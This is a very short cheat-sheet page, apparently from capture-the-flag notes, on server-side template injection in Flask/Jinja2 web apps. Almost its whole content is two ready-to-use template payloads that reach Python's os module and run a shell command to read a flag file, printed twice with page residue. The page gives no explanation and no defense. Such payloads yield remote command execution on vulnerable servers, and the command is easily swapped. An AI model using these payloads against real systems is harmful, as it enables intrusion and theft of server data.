SSTI
Injecting templates from web
{{ url_for.__globals__.os.popen('cat /flag.txt').read() }}{{ self.__init__.__globals__.__builtins__.__import__('os').popen('cat /flag.txt').read() }}Last updated
Injecting templates from web
{{ url_for.__globals__.os.popen('cat /flag.txt').read() }}{{ self.__init__.__globals__.__builtins__.__import__('os').popen('cat /flag.txt').read() }}Last updated